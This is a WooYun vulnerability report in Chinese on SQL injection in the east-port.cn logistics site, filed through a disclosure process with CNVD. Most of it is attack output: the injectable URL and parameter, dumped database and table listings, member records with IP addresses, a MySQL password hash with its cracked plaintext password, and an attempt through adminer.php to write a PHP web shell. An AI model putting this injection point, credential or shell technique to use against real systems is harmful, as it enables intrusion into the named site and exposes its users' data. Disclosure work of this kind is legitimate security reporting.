当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074292

漏洞标题:电子口岸物流商务基地存在SQL注入漏洞

相关厂商:电子口岸物流商务基地

漏洞作者: cf_hb

提交时间:2014-08-29 12:50

修复时间:2014-10-13 12:52

公开时间:2014-10-13 12:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-29: 细节已通知厂商并且等待厂商处理中
2014-09-03: 厂商已经确认,细节仅向厂商公开
2014-09-13: 细节向核心白帽子及相关领域专家公开
2014-09-23: 细节向普通白帽子公开
2014-10-03: 细节向实习白帽子公开
2014-10-13: 细节向公众公开

简要描述:

电子口岸物流商务基地存在SQL注入高危漏洞,并且同时存在后台目录和页面未授权访问等安全问题。

详细说明:

PS(大神们挖大洞,小菜只能挖小洞低级别的了)
厂商域名:www.east-port.cn
截图:

index.PNG


首先看看未授权访问目录及页面漏洞:

dir.PNG


sourceCode.PNG


phpinfo.jpg


无意中看到了这个:

SQL.PNG


嘿嘿。。。目测有注入啦!
注入点URL:http://www.east-port.cn/flash_upload.php?modelid=11
赶紧试一试!
补充参数modelid后测试下:

QQ图片20140828102214.jpg


web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
[10:33:11] [INFO] fetching database names
[10:33:11] [INFO] the SQL query used returns 4 entries
[10:33:11] [INFO] resumed: information_schema
[10:33:11] [INFO] resumed: bak
[10:33:11] [INFO] resumed: mysql
[10:33:11] [INFO] resumed: tianwen_haiguan
[10:33:11] [DEBUG] performed 0 queries in 0.22 seconds
available databases [4]:
[*] bak
[*] information_schema
[*] mysql
[*] tianwen_haiguan
数据库出来了!!
当前数据库是: tianwen_haiguan
下面是注入出来的信息:
Database: tianwen_haiguan
[115 tables]
+-------------------------+
| wip_admin |
| wip_admin_role |
| wip_admin_role_priv |
| wip_ads |
| wip_ads_1104 |
| wip_ads_place |
| wip_ads_stat |
| wip_announce |
| wip_area |
| wip_ask |
| wip_ask_actor |
| wip_ask_credit |
| wip_ask_posts |
| wip_ask_vote |
| wip_attachment |
| wip_author |
| wip_block |
| wip_c_down |
| wip_c_info |
| wip_c_ku6video |
| wip_c_news |
| wip_c_picture |
| wip_c_product |
| wip_c_video |
| wip_cache_count |
| wip_category |
| wip_collect |
| wip_comment |
| wip_content |
| wip_content_count |
| wip_content_position |
| wip_content_tag |
| wip_copyfrom |
| wip_datasource |
| wip_digg |
| wip_digg_log |
| wip_editor_data |
| wip_error_report |
| wip_formguide |
| wip_formguide_fields |
| wip_guestbook |
| wip_hits |
| wip_ipbanned |
| wip_keylink |
| wip_keyword |
| wip_link |
| wip_linkage |
| wip_log |
| wip_mail |
| wip_mail_email |
| wip_mail_email_type |
| wip_member |
| wip_member_cache |
| wip_member_company |
| wip_member_detail |
| wip_member_group |
| wip_member_group_extend |
| wip_member_group_priv |
| wip_member_info |
| wip_menu |
| wip_message |
| wip_model |
| wip_model_field |
| wip_module |
| wip_mood |
| wip_mood_data |
| wip_order |
| wip_order_deliver |
| wip_order_log |
| wip_pay_card |
| wip_pay_exchange |
| wip_pay_payment |
| wip_pay_pointcard_type |
| wip_pay_stat |
| wip_pay_user_account |
| wip_player |
| wip_position |
| wip_process |
| wip_process_status |
| wip_role |
| wip_search |
| wip_search_type |
| wip_session |
| wip_space |
| wip_space_api |
| wip_special |
| wip_special_content |
| wip_spider_job |
| wip_spider_sites |
| wip_spider_urls |
| wip_status |
| wip_times |
| wip_type |
| wip_urlrule |
| wip_video |
| wip_video_count |
| wip_video_data |
| wip_video_position |
| wip_video_special |
| wip_video_special_list |
| wip_video_tag |
| wip_vote_data |
| wip_vote_option |
| wip_vote_subject |
| wip_vote_useroption |
| wip_workflow |
| wip_yp_apply |
| wip_yp_buy |
| wip_yp_cert |
| wip_yp_collect |
| wip_yp_count |
| wip_yp_guestbook |
| wip_yp_job |
| wip_yp_news |
| wip_yp_product |
+-------------------------+
Database: tianwen_haiguan
Table: wip_admin
[6 columns]
+-----------------------+-----------------------+
| Column | Type |
+-----------------------+-----------------------+
| alloweditpassword | tinyint(1) unsigned |
| allowmultilogin | tinyint(1) unsigned |
| disabled | tinyint(1) unsigned |
| editpasswordnextlogin | tinyint(1) unsigned |
| userid | mediumint(8) unsigned |
| username | char(20) |
+-----------------------+-----------------------+
Database: tianwen_haiguan
Table: wip_member_info
[10 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| answer | char(32) |
| avatar | int(10) unsigned |
| lastloginip | char(15) |
| lastlogintime | int(10) unsigned |
| logintimes | smallint(5) unsigned |
| note | char(255) |
| question | char(50) |
| regip | char(15) |
| regtime | int(10) unsigned |
| userid | mediumint(8) unsigned |
+---------------+-----------------------+
Table: wip_member_info
[5 entries]
+--------+---------+----------------+--------+----------------------------------
+------------+----------+------------+----------------+---------------+
| userid | note | regip | avatar | answer
| regtime | question | logintimes | lastloginip | lastlogintime |
+--------+---------+----------------+--------+----------------------------------
+------------+----------+------------+----------------+---------------+
| 1 | <blank> | 127.0.0.1 | 0 | <blank>
| 1302339634 | <blank> | 522 | 172.17.128.250 | 1396395676 |
| 2 | <blank> | 127.0.0.1 | 0 | d41d8cd98f00b204e9800998ecf8427e
| 1313657440 | <blank> | 3 | 127.0.0.1 | 1313658948 |
| 3 | <blank> | 125.34.15.81 | 0 | d41d8cd98f00b204e9800998ecf8427e
| 1314004642 | <blank> | 315 | 172.17.128.250 | 1404275154 |
| 4 | <blank> | 123.116.33.241 | 0 | d41d8cd98f00b204e9800998ecf8427e
| 1314260333 | <blank> | 1 | 123.116.33.241 | 1314260395 |
| 6 | <blank> | 172.17.128.250 | 0 | d41d8cd98f00b204e9800998ecf8427e
| 1352246083 | <blank> | 12 | 172.17.128.250 | 1361231995 |
+--------+---------+----------------+--------+----------------------------------
+------------+----------+------------+----------------+---------------+
mysql数据库密码:
mysql:
Database: mysql
Table: user
[2 entries]
+-------------------------------------------+
| Password |
+-------------------------------------------+
| *3EA0E6E2CCA03AFEE10B8B1B0A2E4EB674D189D4 |
| *3EA0E6E2CCA03AFEE10B8B1B0A2E4EB674D189D4 |
+-------------------------------------------+
花了1毛钱买了hash得到密码:system808
我正担心mysql不能外联呢,正好,在站点页面里翻到了一个adminer.php页面。于是:

adminer.PNG


尝试拿shell时:
查询出错: Can't create/write to file '/var/www/html/cf_hb.php' (Errcode: 13)
小菜不善提权,就做到这一步了!

漏洞证明:

请往上看!

修复方案:

1. 过滤用户提交参数
2. 目录文件后台页面需要登录授权才能访问
PS: 根据经验目测这是被人留下了下马:http://www.east-port.cn/c.php 望管理验证后处理!

版权声明:转载请注明来源 cf_hb@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-09-03 10:06

厂商回复:

CNVD确认所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

评论